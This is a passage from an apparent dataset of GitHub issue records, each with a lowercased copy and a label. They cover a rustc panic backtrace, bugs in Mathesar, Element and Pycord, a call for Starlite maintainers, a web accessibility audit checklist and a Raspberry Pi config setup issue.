rustc_query_system::query::config::QueryAccessors<rustc_middle::ty::context::TyCtxt> for rustc_middle::ty::query::queries::collect_and_partition_mono_items>::compute 34: rustc_query_system::dep_graph::graph::DepGraph<K>::with_task_impl 35: rustc_data_structures::stack::ensure_sufficient_stack 36: rustc_query_system::query::plumbing::get_query_impl 37: rustc_codegen_ssa::base::codegen_crate 38: <rustc_codegen_llvm::LlvmCodegenBackend as rustc_codegen_ssa::traits::backend::CodegenBackend>::codegen_crate 39: rustc_interface::passes::start_codegen 40: rustc_middle::ty::context::tls::enter_global 41: rustc_interface::queries::Queries::ongoing_codegen 42: 
rustc_interface::interface::run_compiler_in_existing_thread_pool 43: rustc_ast::attr::with_globals note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace. note: the compiler unexpectedly panicked. this is a bug. note: we would appreciate a bug report: https://github.com/rust-lang/rust/blob/master/CONTRIBUTING.md#bug-reports note: rustc 1.45.2 (d3fb005a3 2020-07-31) running on x86_64-apple-darwin query stack during panic: #0 [codegen_fulfill_obligation] checking if `Callback` fulfills its obligations #1 [resolve_instance] resolving instance `<main::MyCall as Callback>::cb` #2 [collect_and_partition_mono_items] collect_and_partition_mono_items end of query stack error: aborting due to previous error ``` </p> </details>
non_main
unexpected panic when trait not implemented code rust pub trait callback fn cb pub trait processing type call callback fn f p call cb fn main struct mycall f meta if you re using the stable version of the compiler you should also check if the bug also exists in the beta or nightly versions rustc version verbose rustc binary rustc commit hash commit date host apple darwin release llvm version error output rustc src main rs error internal compiler error src librustc trait selection traits codegen mod rs encountered error unimplemented selecting binder during codegen include a backtrace in the code block by setting rust backtrace in your environment e g rust backtrace cargo build backtrace thread rustc panicked at box src librustc errors lib rs stack backtrace fmt core fmt write std io write write fmt std panicking default hook closure std panicking default hook rustc driver report ice std panicking rust panic with hook std panicking begin panic rustc errors handlerinner bug rustc errors handler bug rustc middle util bug opt span bug fmt closure rustc middle ty context tls with opt closure rustc middle ty context tls with opt rustc middle util bug opt span bug fmt rustc middle util bug bug fmt rustc middle ty context globalctxt enter local rustc trait selection traits codegen codegen fulfill obligation rustc middle ty query for rustc middle ty query queries codegen fulfill obligation compute rustc query system dep graph graph depgraph with task impl rustc data structures stack ensure sufficient stack rustc query system query plumbing get query impl rustc ty instance resolve instance rustc middle ty query for rustc middle ty query queries resolve instance compute rustc query system dep graph graph depgraph with task impl rustc data structures stack ensure sufficient stack rustc query system query plumbing get query impl rustc middle ty instance instance resolve visit terminator kind rustc mir monomorphize collector collect neighbours rustc mir monomorphize collector 
collect items rec rustc mir monomorphize collector collect items rec rustc mir monomorphize collector collect crate mono items rustc mir monomorphize partitioning collect and partition mono items rustc middle ty query for rustc middle ty query queries collect and partition mono items compute rustc query system dep graph graph depgraph with task impl rustc data structures stack ensure sufficient stack rustc query system query plumbing get query impl rustc codegen ssa base codegen crate codegen crate rustc interface passes start codegen rustc middle ty context tls enter global rustc interface queries queries ongoing codegen rustc interface interface run compiler in existing thread pool rustc ast attr with globals note some details are omitted run with rust backtrace full for a verbose backtrace note the compiler unexpectedly panicked this is a bug note we would appreciate a bug report note rustc running on apple darwin query stack during panic checking if callback fulfills its obligations resolving instance cb collect and partition mono items end of query stack error aborting due to previous error
0
5,111
26,034,937,216
IssuesEvent
2022-12-22 03:14:52
centerofci/mathesar
https://api.github.com/repos/centerofci/mathesar
opened
Summarization suggestion aggregates columns instead of grouping, when the base column is a unique key column
type: bug work: backend status: ready restricted: maintainers
## Description * Select a table with a unique key column as the base table in Data Explorer Eg., Patrons * Add the unique key column, along with a few other columns. Eg., Email, first name, last name * Summarize by the unique key column. Expect the other columns to be grouped, instead notice that they are aggregated as a list.
True
Summarization suggestion aggregates columns instead of grouping, when the base column is a unique key column - ## Description * Select a table with a unique key column as the base table in Data Explorer Eg., Patrons * Add the unique key column, along with a few other columns. Eg., Email, first name, last name * Summarize by the unique key column. Expect the other columns to be grouped, instead notice that they are aggregated as a list.
main
summarization suggestion aggregates columns instead of grouping when the base column is a unique key column description select a table with a unique key column as the base table in data explorer eg patrons add the unique key column along with a few other columns eg email first name last name summarize by the unique key column expect the other columns to be grouped instead notice that they are aggregated as a list
1
4,582
23,804,191,525
IssuesEvent
2022-09-03 19:32:47
kjaymiller/Python-Community-News
https://api.github.com/repos/kjaymiller/Python-Community-News
closed
Starlite looking for Maintainers and Contributors
Content maintainers
### URL https://www.reddit.com/r/Python/comments/wz07o3/starlite_is_looking_for_contributors_and/ ### When was this post released 26 Aug 2022 ### Summary The maintainer of Starlite made a plea to the community looking for maintainers and organizers. This seemed to receive positive feedback as many folks offered to help. The maintainer claimed that: > it's a core pillar of Starlite to have multiple maintainers and be as open, inviting and accessible for contributions as we can be. If you're interested in being a maintainer you can check out the request on [r/python](https://www.reddit.com/r/Python/comments/wz07o3/starlite_is_looking_for_contributors_and/ ). ### Code of Conduct - [X] I agree to follow this project's Code of Conduct
True
Starlite looking for Maintainers and Contributors - ### URL https://www.reddit.com/r/Python/comments/wz07o3/starlite_is_looking_for_contributors_and/ ### When was this post released 26 Aug 2022 ### Summary The maintainer of Starlite made a plea to the community looking for maintainers and organizers. This seemed to receive positive feedback as many folks offered to help. The maintainer claimed that: > it's a core pillar of Starlite to have multiple maintainers and be as open, inviting and accessible for contributions as we can be. If you're interested in being a maintainer you can check out the request on [r/python](https://www.reddit.com/r/Python/comments/wz07o3/starlite_is_looking_for_contributors_and/ ). ### Code of Conduct - [X] I agree to follow this project's Code of Conduct
main
starlite looking for maintainers and contributors url when was this post released aug summary the maintainer of starlite made a plea to the community looking for maintainers and organizers this seemed to receive positive feedback as many folks offered to help the maintainer claimed that it s a core pillar of starlite to have multiple maintainers and be as open inviting and accessible for contributions as we can be if you re interested in being a maintainer you can check out the request on code of conduct i agree to follow this project s code of conduct
1
4,581
23,793,802,947
IssuesEvent
2022-09-02 17:08:43
Vivelin/SMZ3Randomizer
https://api.github.com/repos/Vivelin/SMZ3Randomizer
opened
Split out configs into a separate project
:wrench: maintainability
The current config system can't be accessed in the randomizer project. Because of that, the configs should be added to a unique project so that they can be accessed globally.
True
Split out configs into a separate project - The current config system can't be accessed in the randomizer project. Because of that, the configs should be added to a unique project so that they can be accessed globally.
main
split out configs into a separate project the current config system can t be accessed in the randomizer project because of that the configs should be added to a unique project so that they can be accessed globally
1
4,778
24,606,989,337
IssuesEvent
2022-10-14 17:12:07
duckduckgo/zeroclickinfo-longtail
https://api.github.com/repos/duckduckgo/zeroclickinfo-longtail
closed
Test issue, please ignore
Maintainer Input Requested
> used for back-end tests within the Community Platform repo. //cc @jbarrett
True
Test issue, please ignore - > used for back-end tests within the Community Platform repo. //cc @jbarrett
main
test issue please ignore used for back end tests within the community platform repo cc jbarrett
1
773,928
27,176,267,003
IssuesEvent
2023-02-18 02:46:05
CSAllenISD/2023-ISP-unIQue
https://api.github.com/repos/CSAllenISD/2023-ISP-unIQue
opened
Help Tree Homepage CSS/HTML
High Priority Help Tree HTML/CSS
The Help Tree Homepage will consist of interactive buttons that redirect the user to other sections of the site, prioritize ease of access and accessibility on this page; large and minimalistic for the most part.
1.0
Help Tree Homepage CSS/HTML - The Help Tree Homepage will consist of interactive buttons that redirect the user to other sections of the site, prioritize ease of access and accessibility on this page; large and minimalistic for the most part.
non_main
help tree homepage css html the help tree homepage will consist of interactive buttons that redirect the user to other sections of the site prioritize ease of access and accessibility on this page large and minimalistic for the most part
0
76,405
26,412,325,840
IssuesEvent
2023-01-13 13:17:53
vector-im/element-web
https://api.github.com/repos/vector-im/element-web
closed
Element shows "Decryption key withheld" when it wasn't
T-Defect S-Minor O-Occasional
When Element Android (and other clients based on matrix-android-sdk2) gets an `m.room_key_request` for a key that it doesn't have, it sends an `m.room_key.withheld` message with a code of `m.unavailable` (see [implementation](https://github.com/vector-im/element-android/blob/75de805417ffea6cd2b1647e098d1d32f8e3f17b/matrix-sdk-android/src/main/java/org/matrix/android/sdk/internal/crypto/IncomingKeyRequestManager.kt#L403)). Having received the `m.unavailable` response, Element-web shows "Decryption key withheld", which is misleading at best.
1.0
Element shows "Decryption key withheld" when it wasn't - When Element Android (and other clients based on matrix-android-sdk2) gets an `m.room_key_request` for a key that it doesn't have, it sends an `m.room_key.withheld` message with a code of `m.unavailable` (see [implementation](https://github.com/vector-im/element-android/blob/75de805417ffea6cd2b1647e098d1d32f8e3f17b/matrix-sdk-android/src/main/java/org/matrix/android/sdk/internal/crypto/IncomingKeyRequestManager.kt#L403)). Having received the `m.unavailable` response, Element-web shows "Decryption key withheld", which is misleading at best.
non_main
element shows decryption key withheld when it wasn t when element android and other clients based on matrix android gets an m room key request for a key that it doesn t have it sends an m room key withheld message with a code of m unavailable see having received the m unavailable response element web shows decryption key withheld which is misleading at best
0
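The Element record above turns on how a client renders `m.room_key.withheld` codes: `m.unavailable` means the sender's device simply no longer has the key, not that it was deliberately refused, so showing "Decryption key withheld" is misleading. A minimal Python sketch of such a code-to-message mapping (illustrative only; the real element-web client is TypeScript, and the user-facing strings here are invented, though the codes themselves come from the Matrix spec):

```python
# Hypothetical mapping of m.room_key.withheld codes to user-facing text,
# so that m.unavailable is not conflated with a deliberate refusal.
# The codes are from the Matrix spec; the messages are invented for this sketch.
WITHHELD_MESSAGES = {
    "m.unverified": "The sender has disabled encrypting to unverified devices.",
    "m.blacklisted": "The sender has blocked you.",
    "m.unavailable": "The sender's device no longer has the decryption key.",
}

def describe_withheld(code: str) -> str:
    """Return a user-facing explanation for a withheld-key code."""
    # Fall back to the generic wording only for codes we have no text for.
    return WITHHELD_MESSAGES.get(code, "Decryption key withheld.")
```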
136,510
11,049,329,690
IssuesEvent
2019-12-09 23:22:52
MangopearUK/European-Boating-Association--Theme
https://api.github.com/repos/MangopearUK/European-Boating-Association--Theme
closed
Test & audit: International Organization for Standardization (ISO)
Testing: second round
Page URL: https://eba.eu.com/technical/iso/ ## Table of contents - [x] **Task 1:** Perform automated audits _(10 tasks)_ - [x] **Task 2:** Manual standards & accessibility tests _(61 tasks)_ - [x] **Task 3:** Breakpoint testing _(15 tasks)_ - [x] **Task 4:** Re-run automated audits _(10 tasks)_ ## 1: Perform automated audits _(10 tasks)_ ### Lighthouse: - [x] Run "Accessibility" audit in lighthouse _(using incognito tab)_ - [x] Run "Performance" audit in lighthouse _(using incognito tab)_ - [x] Run "Best practices" audit in lighthouse _(using incognito tab)_ - [x] Run "SEO" audit in lighthouse _(using incognito tab)_ - [x] Run "PWA" audit in lighthouse _(using incognito tab)_ ### Pingdom - [x] Run full audit of the the page's performance in Pingdom ### Browser's console - [x] Check Chrome's console for errors ### Log results of audits - [x] Screenshot snapshot of the lighthouse audits - [x] Upload PDF of detailed lighthouse reports - [x] Provide a screenshot of any console errors ## 2: Manual standards & accessibility tests _(61 tasks)_ ### Forms - [x] Give all form elements permanently visible labels - [x] Place labels above form elements - [x] Mark invalid fields clearly and provide associated error messages - [x] Make forms as short as possible; offer shortcuts like autocompleting the address using the postcode - [x] Ensure all form fields have the correct requried state - [x] Provide status and error messages as WAI-ARIA live regions ### Readability of content - [x] Ensure page has good grammar - [x] Ensure page content has been spell-checked - [x] Make sure headings are in logical order - [x] Ensure the same content is available across different devices and platforms - [x] Begin long, multi-section documents with a table of contents ### Presentation - [x] Make sure all content is formatted correctly - [x] Avoid all-caps text - [x] Make sure data tables wider than their container can be scrolled horizontally - [x] Use the same design patterns to solve the same 
problems - [x] Do not mark up subheadings/straplines with separate heading elements ### Links & buttons #### Links - [x] Check all links to ensure they work - [x] Check all links to third party websites use `rel="noopener"` - [x] Make sure the purpose of a link is clearly described: "read more" vs. "read more about accessibility" - [x] Provide a skip link if necessary - [x] Underline links — at least in body copy - [x] Warn users of links that have unusual behaviors, like linking off-site, or loading a new tab (i.e. aria-label) #### Buttons - [x] Ensure primary calls to action are easy to recognize and reach - [x] Provide clear, unambiguous focus styles - [x] Ensure states (pressed, expanded, invalid, etc) are communicated to assistive software - [x] Ensure disabled controls are not focusable - [x] Make sure controls within hidden content are not focusable - [x] Provide large touch "targets" for interactive elements - [x] Make controls look like controls; give them strong perceived affordance - [x] Use well-established, therefore recognizable, icons and symbols ### Assistive technology - [x] Ensure content is not obscured through zooming - [x] Support Windows high contrast mode (use images, not background images) - [x] Provide alternative text for salient images - [x] Make scrollable elements focusable for keyboard users - [x] Ensure keyboard focus order is logical regarding visual layout - [x] Match semantics to behavior for assistive technology users - [x] Provide a default language and use lang="[ISO code]" for subsections in different languages - [x] Inform the user when there are important changes to the application state - [x] Do not hijack standard scrolling behavior - [x] Do not instate "infinite scroll" by default; provide buttons to load more items ### General accessibility - [x] Make sure text and background colors contrast sufficiently - [x] Do not rely on color for differentiation of visual elements - [x] Avoid images of text — text that cannot be 
translated, selected, or understood by assistive tech - [x] Provide a print stylesheet - [x] Honour requests to remove animation via the prefers-reduced-motion media query ### SEO - [x] Ensure all pages have appropriate title - [x] Ensure all pages have meta descriptions - [x] Make content easier to find and improve search results with structured data [Read more](https://developers.google.com/search/docs/guides/prototype) - [x] Check whether page should be appearing in sitemap - [x] Make sure page has Facebook and Twitter large image previews set correctly - [x] Check canonical links for page - [x] Mark as cornerstone content? ### Performance - [x] Ensure all CSS assets are minified and concatenated - [x] Ensure all JS assets are minified and concatenated - [x] Ensure all images are compressed - [x] Where possible, remove redundant code - [x] Ensure all SVG assets have been optimised - [x] Make sure styles and scripts are not render blocking - [x] Ensure large image assets are lazy loaded ### Other - [x] Make sure all content belongs to a landmark element - [x] Provide a manifest.json file for identifiable homescreen entries ## 3: Breakpoint testing _(15 tasks)_ ### Desktop - [x] Provide a full screenshot of **1920px** wide page - [x] Provide a full screenshot of **1500px** wide page - [x] Provide a full screenshot of **1280px** wide page - [x] Provide a full screenshot of **1024px** wide page ### Tablet - [x] Provide a full screenshot of **960px** wide page - [x] Provide a full screenshot of **800px** wide page - [x] Provide a full screenshot of **760px** wide page - [x] Provide a full screenshot of **650px** wide page ### Mobile - [x] Provide a full screenshot of **600px** wide page - [x] Provide a full screenshot of **500px** wide page - [x] Provide a full screenshot of **450px** wide page - [x] Provide a full screenshot of **380px** wide page - [x] Provide a full screenshot of **320px** wide page - [x] Provide a full screenshot of **280px** wide page - [x] 
Provide a full screenshot of **250px** wide page ## 4: Re-run automated audits _(10 tasks)_ ### Lighthouse: - [x] Run "Accessibility" audit in lighthouse _(using incognito tab)_ - [x] Run "Performance" audit in lighthouse _(using incognito tab)_ - [x] Run "Best practices" audit in lighthouse _(using incognito tab)_ - [x] Run "SEO" audit in lighthouse _(using incognito tab)_ - [x] Run "PWA" audit in lighthouse _(using incognito tab)_ ### Pingdom - [x] Run full audit of the the page's performance in Pingdom ### Browser's console - [x] Check Chrome's console for errors ### Log results of audits - [x] Screenshot snapshot of the lighthouse audits - [x] Upload PDF of detailed lighthouse reports - [x] Provide a screenshot of any console errors
1.0
Test & audit: International Organization for Standardization (ISO) - Page URL: https://eba.eu.com/technical/iso/ ## Table of contents - [x] **Task 1:** Perform automated audits _(10 tasks)_ - [x] **Task 2:** Manual standards & accessibility tests _(61 tasks)_ - [x] **Task 3:** Breakpoint testing _(15 tasks)_ - [x] **Task 4:** Re-run automated audits _(10 tasks)_ ## 1: Perform automated audits _(10 tasks)_ ### Lighthouse: - [x] Run "Accessibility" audit in lighthouse _(using incognito tab)_ - [x] Run "Performance" audit in lighthouse _(using incognito tab)_ - [x] Run "Best practices" audit in lighthouse _(using incognito tab)_ - [x] Run "SEO" audit in lighthouse _(using incognito tab)_ - [x] Run "PWA" audit in lighthouse _(using incognito tab)_ ### Pingdom - [x] Run full audit of the the page's performance in Pingdom ### Browser's console - [x] Check Chrome's console for errors ### Log results of audits - [x] Screenshot snapshot of the lighthouse audits - [x] Upload PDF of detailed lighthouse reports - [x] Provide a screenshot of any console errors ## 2: Manual standards & accessibility tests _(61 tasks)_ ### Forms - [x] Give all form elements permanently visible labels - [x] Place labels above form elements - [x] Mark invalid fields clearly and provide associated error messages - [x] Make forms as short as possible; offer shortcuts like autocompleting the address using the postcode - [x] Ensure all form fields have the correct requried state - [x] Provide status and error messages as WAI-ARIA live regions ### Readability of content - [x] Ensure page has good grammar - [x] Ensure page content has been spell-checked - [x] Make sure headings are in logical order - [x] Ensure the same content is available across different devices and platforms - [x] Begin long, multi-section documents with a table of contents ### Presentation - [x] Make sure all content is formatted correctly - [x] Avoid all-caps text - [x] Make sure data tables wider than their container can be 
scrolled horizontally - [x] Use the same design patterns to solve the same problems - [x] Do not mark up subheadings/straplines with separate heading elements ### Links & buttons #### Links - [x] Check all links to ensure they work - [x] Check all links to third party websites use `rel="noopener"` - [x] Make sure the purpose of a link is clearly described: "read more" vs. "read more about accessibility" - [x] Provide a skip link if necessary - [x] Underline links — at least in body copy - [x] Warn users of links that have unusual behaviors, like linking off-site, or loading a new tab (i.e. aria-label) #### Buttons - [x] Ensure primary calls to action are easy to recognize and reach - [x] Provide clear, unambiguous focus styles - [x] Ensure states (pressed, expanded, invalid, etc) are communicated to assistive software - [x] Ensure disabled controls are not focusable - [x] Make sure controls within hidden content are not focusable - [x] Provide large touch "targets" for interactive elements - [x] Make controls look like controls; give them strong perceived affordance - [x] Use well-established, therefore recognizable, icons and symbols ### Assistive technology - [x] Ensure content is not obscured through zooming - [x] Support Windows high contrast mode (use images, not background images) - [x] Provide alternative text for salient images - [x] Make scrollable elements focusable for keyboard users - [x] Ensure keyboard focus order is logical regarding visual layout - [x] Match semantics to behavior for assistive technology users - [x] Provide a default language and use lang="[ISO code]" for subsections in different languages - [x] Inform the user when there are important changes to the application state - [x] Do not hijack standard scrolling behavior - [x] Do not instate "infinite scroll" by default; provide buttons to load more items ### General accessibility - [x] Make sure text and background colors contrast sufficiently - [x] Do not rely on color for 
differentiation of visual elements - [x] Avoid images of text — text that cannot be translated, selected, or understood by assistive tech - [x] Provide a print stylesheet - [x] Honour requests to remove animation via the prefers-reduced-motion media query ### SEO - [x] Ensure all pages have appropriate title - [x] Ensure all pages have meta descriptions - [x] Make content easier to find and improve search results with structured data [Read more](https://developers.google.com/search/docs/guides/prototype) - [x] Check whether page should be appearing in sitemap - [x] Make sure page has Facebook and Twitter large image previews set correctly - [x] Check canonical links for page - [x] Mark as cornerstone content? ### Performance - [x] Ensure all CSS assets are minified and concatenated - [x] Ensure all JS assets are minified and concatenated - [x] Ensure all images are compressed - [x] Where possible, remove redundant code - [x] Ensure all SVG assets have been optimised - [x] Make sure styles and scripts are not render blocking - [x] Ensure large image assets are lazy loaded ### Other - [x] Make sure all content belongs to a landmark element - [x] Provide a manifest.json file for identifiable homescreen entries ## 3: Breakpoint testing _(15 tasks)_ ### Desktop - [x] Provide a full screenshot of **1920px** wide page - [x] Provide a full screenshot of **1500px** wide page - [x] Provide a full screenshot of **1280px** wide page - [x] Provide a full screenshot of **1024px** wide page ### Tablet - [x] Provide a full screenshot of **960px** wide page - [x] Provide a full screenshot of **800px** wide page - [x] Provide a full screenshot of **760px** wide page - [x] Provide a full screenshot of **650px** wide page ### Mobile - [x] Provide a full screenshot of **600px** wide page - [x] Provide a full screenshot of **500px** wide page - [x] Provide a full screenshot of **450px** wide page - [x] Provide a full screenshot of **380px** wide page - [x] Provide a full screenshot of 
**320px** wide page - [x] Provide a full screenshot of **280px** wide page - [x] Provide a full screenshot of **250px** wide page ## 4: Re-run automated audits _(10 tasks)_ ### Lighthouse: - [x] Run "Accessibility" audit in lighthouse _(using incognito tab)_ - [x] Run "Performance" audit in lighthouse _(using incognito tab)_ - [x] Run "Best practices" audit in lighthouse _(using incognito tab)_ - [x] Run "SEO" audit in lighthouse _(using incognito tab)_ - [x] Run "PWA" audit in lighthouse _(using incognito tab)_ ### Pingdom - [x] Run full audit of the the page's performance in Pingdom ### Browser's console - [x] Check Chrome's console for errors ### Log results of audits - [x] Screenshot snapshot of the lighthouse audits - [x] Upload PDF of detailed lighthouse reports - [x] Provide a screenshot of any console errors
non_main
test audit international organization for standardization iso page url table of contents task perform automated audits tasks task manual standards accessibility tests tasks task breakpoint testing tasks task re run automated audits tasks perform automated audits tasks lighthouse run accessibility audit in lighthouse using incognito tab run performance audit in lighthouse using incognito tab run best practices audit in lighthouse using incognito tab run seo audit in lighthouse using incognito tab run pwa audit in lighthouse using incognito tab pingdom run full audit of the the page s performance in pingdom browser s console check chrome s console for errors log results of audits screenshot snapshot of the lighthouse audits upload pdf of detailed lighthouse reports provide a screenshot of any console errors manual standards accessibility tests tasks forms give all form elements permanently visible labels place labels above form elements mark invalid fields clearly and provide associated error messages make forms as short as possible offer shortcuts like autocompleting the address using the postcode ensure all form fields have the correct requried state provide status and error messages as wai aria live regions readability of content ensure page has good grammar ensure page content has been spell checked make sure headings are in logical order ensure the same content is available across different devices and platforms begin long multi section documents with a table of contents presentation make sure all content is formatted correctly avoid all caps text make sure data tables wider than their container can be scrolled horizontally use the same design patterns to solve the same problems do not mark up subheadings straplines with separate heading elements links buttons links check all links to ensure they work check all links to third party websites use rel noopener make sure the purpose of a link is clearly described read more vs read more about accessibility provide a 
skip link if necessary underline links — at least in body copy warn users of links that have unusual behaviors like linking off site or loading a new tab i e aria label buttons ensure primary calls to action are easy to recognize and reach provide clear unambiguous focus styles ensure states pressed expanded invalid etc are communicated to assistive software ensure disabled controls are not focusable make sure controls within hidden content are not focusable provide large touch targets for interactive elements make controls look like controls give them strong perceived affordance use well established therefore recognizable icons and symbols assistive technology ensure content is not obscured through zooming support windows high contrast mode use images not background images provide alternative text for salient images make scrollable elements focusable for keyboard users ensure keyboard focus order is logical regarding visual layout match semantics to behavior for assistive technology users provide a default language and use lang for subsections in different languages inform the user when there are important changes to the application state do not hijack standard scrolling behavior do not instate infinite scroll by default provide buttons to load more items general accessibility make sure text and background colors contrast sufficiently do not rely on color for differentiation of visual elements avoid images of text — text that cannot be translated selected or understood by assistive tech provide a print stylesheet honour requests to remove animation via the prefers reduced motion media query seo ensure all pages have appropriate title ensure all pages have meta descriptions make content easier to find and improve search results with structured data check whether page should be appearing in sitemap make sure page has facebook and twitter large image previews set correctly check canonical links for page mark as cornerstone content performance ensure all css assets 
are minified and concatenated ensure all js assets are minified and concatenated ensure all images are compressed where possible remove redundant code ensure all svg assets have been optimised make sure styles and scripts are not render blocking ensure large image assets are lazy loaded other make sure all content belongs to a landmark element provide a manifest json file for identifiable homescreen entries breakpoint testing tasks desktop provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page tablet provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page mobile provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page re run automated audits tasks lighthouse run accessibility audit in lighthouse using incognito tab run performance audit in lighthouse using incognito tab run best practices audit in lighthouse using incognito tab run seo audit in lighthouse using incognito tab run pwa audit in lighthouse using incognito tab pingdom run full audit of the the page s performance in pingdom browser s console check chrome s console for errors log results of audits screenshot snapshot of the lighthouse audits upload pdf of detailed lighthouse reports provide a screenshot of any console errors
0
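The audit record above repeats the same five Lighthouse category audits before and after the manual tests. As an illustrative aside, a small Python helper that assembles the corresponding Lighthouse CLI invocation (a sketch assuming the `lighthouse` npm CLI is installed; the command is only built here, not executed):

```python
# Hedged sketch: assemble the argv for a headless Lighthouse run covering
# the audit categories named in the checklist above. Flag names are from
# the lighthouse npm CLI; nothing is executed in this snippet.
from typing import List

CATEGORIES = ["accessibility", "performance", "best-practices", "seo", "pwa"]

def lighthouse_cmd(url: str, categories: List[str], out_path: str) -> List[str]:
    """Build the command line for one Lighthouse audit pass."""
    return [
        "lighthouse", url,
        "--only-categories=" + ",".join(categories),
        "--output=json",
        "--output-path=" + out_path,
        "--chrome-flags=--headless",
    ]
```

The resulting argv could be handed to `subprocess.run` once per audited page.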
172,166
14,351,168,140
IssuesEvent
2020-11-30 00:11:36
ironsheep/RPi-Reporter-MQTT2HA-Daemon
https://api.github.com/repos/ironsheep/RPi-Reporter-MQTT2HA-Daemon
closed
Configuration for non linux initiated
documentation
**Is your feature request related to a problem? Please describe.** I just installed it on my RPi 3 B+ r1.3. When I get to the configuration step, here are some errors I got. Error 1 at step: cp /opt/RPi-Reporter-MQTT2HA-Daemon/config.{ini.dist,ini} Returned message: cp: cannot create regular file '/opt/RPi-Reporter-MQTT2HA-Daemon/config.ini': Permission denied Error 2 at the next step: vim /opt/RPi-Reporter-MQTT2HA-Daemon/config.ini Returned message: -bash: vim: command not found **Describe the solution you'd like** Error 1: This command worked for me: sudo cp /opt/RPi-Reporter-MQTT2HA-Daemon/config.{ini.dist,ini} Error 2: This command worked for me: sudo nano /opt/RPi-Reporter-MQTT2HA-Daemon/config.ini **Describe alternatives you've considered** A clear and concise description of any alternative solutions or features you've considered. **Additional context** This is just to help anyone that runs into these Linux basics and is a Home Assistant and smart-home enthusiast. Other than this it was straightforward; thanks to Stephen.
1.0
Configuration for non linux initiated - **Is your feature request related to a problem? Please describe.** I just installed it on my RPi 3 B+ r1.3. When I get to the configuration step, here are some errors I got. Error 1 at step: cp /opt/RPi-Reporter-MQTT2HA-Daemon/config.{ini.dist,ini} Returned message: cp: cannot create regular file '/opt/RPi-Reporter-MQTT2HA-Daemon/config.ini': Permission denied Error 2 at the next step: vim /opt/RPi-Reporter-MQTT2HA-Daemon/config.ini Returned message: -bash: vim: command not found **Describe the solution you'd like** Error 1: This command worked for me: sudo cp /opt/RPi-Reporter-MQTT2HA-Daemon/config.{ini.dist,ini} Error 2: This command worked for me: sudo nano /opt/RPi-Reporter-MQTT2HA-Daemon/config.ini **Describe alternatives you've considered** A clear and concise description of any alternative solutions or features you've considered. **Additional context** This is just to help anyone that runs into these Linux basics and is a Home Assistant and smart-home enthusiast. Other than this it was straightforward; thanks to Stephen.
non_main
configuration for non linux initiated is your feature request related to a problem please describe i just installed it on my rpi b when i get to the configuration step here are some errors i got error at step cp opt rpi reporter daemon config ini dist ini returned message cp cannot create regular file opt rpi reporter daemon config ini permission denied error at the next step vim opt rpi reporter daemon config ini returned message bash vim command not found describe the solution you d like error this command worked for me sudo cp opt rpi reporter daemon config ini dist ini error this command worked for me sudo nano opt rpi reporter daemon config ini describe alternatives you ve considered a clear and concise description of any alternative solutions or features you ve considered additional context this is just to help any one that runs into these linux basics and is a home assistant and smart home enthousiaste other then this straight forward thanks to stephen
0
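The RPi record above boils down to one manual step, copying `config.ini.dist` to `config.ini`, that failed with `Permission denied`. A minimal Python sketch of the same step with a clearer hint on failure (the `sudo cp` suggestion mirrors the fix in the record; the function name is invented for illustration):

```python
# Sketch of the config-install step from the record above: copy the
# .dist template into place, and surface a clearer hint when the copy
# fails for lack of permissions (the error the reporter hit).
import shutil
from pathlib import Path

def install_config(src: str, dst: str) -> str:
    """Copy src to dst unless dst already exists; return a status string."""
    if Path(dst).exists():
        return "exists"
    try:
        shutil.copyfile(src, dst)
        return "copied"
    except PermissionError:
        # Same remedy the issue reporter landed on.
        return f"permission denied: retry with sudo cp {src} {dst}"
```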
4,679
24,175,476,803
IssuesEvent
2022-09-23 00:50:08
Pycord-Development/pycord
https://api.github.com/repos/Pycord-Development/pycord
closed
ext.pages message is none if "View Channel" permissions are missing
unconfirmed bug ext.pages (not maintained)
### Summary If the bot does not have "View Channel" permissions, exceptions are not catched ### Reproduction Steps ```py @slash_command() async def test(self, ctx): await ctx.defer() # Note: The defer is needed! Otherwise it works page_groups = [] page_groups.append(pages.PageGroup(pages="1", label="label 1")) page_groups.append(pages.PageGroup(pages="2", label="label 2")) paginator = pages.Paginator(pages=page_groups, show_disabled=False, show_menu=True) await paginator.respond(ctx.interaction, ephemeral=False) ``` ### Minimal Reproducible Code _No response_ ### Expected Results That it should either work (like without `defer`) or catch the exception :) ### Actual Results On `/test` you get: ``` Ignoring exception in command test: Traceback (most recent call last): File "g:\develop\bot\venv_pycord\lib\site-packages\discord\commands\core.py", line 127, in wrapped ret = await coro(arg) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\commands\core.py", line 877, in _invoke await self.callback(self.cog, ctx, **kwargs) File "g:\develop\bot\cogs\stuff.py", line 403, in test await paginator.respond(ctx.interaction, ephemeral=False) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\ext\pages\pagination.py", line 1068, in respond msg = await msg.channel.fetch_message(msg.id) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\abc.py", line 1601, in fetch_message data = await self._state.http.get_message(channel.id, id) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\http.py", line 354, in request raise Forbidden(response, data) discord.errors.Forbidden: 403 Forbidden (error code: 50001): Missing Access The above exception was the direct cause of the following exception: Traceback (most recent call last): File "g:\develop\bot\venv_pycord\lib\site-packages\discord\bot.py", line 992, in invoke_application_command await ctx.command.invoke(ctx) File "g:\develop\bot\venv_pycord\lib\site-packages\discord\commands\core.py", line 358, in invoke 
